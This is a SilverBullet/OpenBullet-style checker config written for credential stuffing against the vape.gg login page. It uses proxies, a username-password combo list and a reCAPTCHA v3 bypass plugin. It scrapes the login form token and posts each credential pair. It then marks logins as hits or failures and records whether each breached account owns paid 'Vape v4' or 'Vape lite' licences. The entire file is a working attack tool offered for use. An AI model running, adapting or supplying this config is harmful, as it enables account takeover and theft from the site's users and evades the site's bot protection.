[SETTINGS]
{
  "Name": "vape.gg",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-12-18T23:30:16.8586891+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [
    "RecaptchaV3Bypass"
  ],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "vape",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
RecaptchaV3Bypass "https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfjzbQUAAAAAPKZqfNcKQ6ZxSZ_9dyV1LMaeex9&co=aHR0cHM6Ly93d3cudmFwZS5nZzo0NDM.&hl=en&v=VZKEDW9wslPbEc9RmzMqaOAP&size=invisible&cb=8nm7wsaeygg8" "" "https://www.google.com/recaptcha/api2/reload?k=6LfjzbQUAAAAAPKZqfNcKQ6ZxSZ_9dyV1LMaeex9" -> VAR "SOLUTION" 
  

#get REQUEST GET "https://www.vape.gg/login" 
  
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: max-age=0" 
  HEADER "referer: https://www.vape.gg/login" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "sec-gpc: 1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 

#tk PARSE "<SOURCE>" LR "name=\"_token\" value=\"" "\">" -> VAR "tk" 

#USER FUNCTION URLEncode "<USER>" -> VAR "USER" 

#PASS FUNCTION URLEncode "<PASS>" -> VAR "PASS" 

#login REQUEST POST "https://www.vape.gg/login" 
  CONTENT "_token=<tk>&login=<USER>&password=<PASS>&g-recaptcha-response=<SOLUTION>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: max-age=0" 
  HEADER "content-length: 571" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "origin: https://www.vape.gg" 
  HEADER "referer: https://www.vape.gg/login" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "sec-gpc: 1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "The username field is required." 
    KEY "These credentials do not match our records." 
  KEYCHAIN Success OR 
    KEY "My account" 

#capture REQUEST GET "https://www.vape.gg/account" 
  
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: max-age=0" 
  HEADER "referer: https://www.vape.gg/login" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "sec-gpc: 1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 

#VAPE_LITE PARSE "<SOURCE>" LR "class=\"vape_name\">vape lite</div>" "   </div>" -> VAR "VAPELITE" 

#VAPELITE FUNCTION Replace "<div class=\"vape_sub\">" "" "<VAPELITE>" -> CAP "VAPELITE" 

#VAPE_V4 PARSE "<SOURCE>" LR "class=\"vape_name\">Vape v4</div>" " <a" -> VAR "VAPEV4" 

#VAPE_V4 FUNCTION Replace "<div class=\"vape_sub\">" "" "<VAPEV4>" -> CAP "VAPEV4" 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

#custom KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<VAPEV4>" DoesNotContain "Not purchased" 
    KEY "<VAPELITE>" DoesNotContain "Not purchased" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<VAPELITE>" Contains "Not purchased" 
    KEY "<VAPEV4>" Contains "Not purchased" 

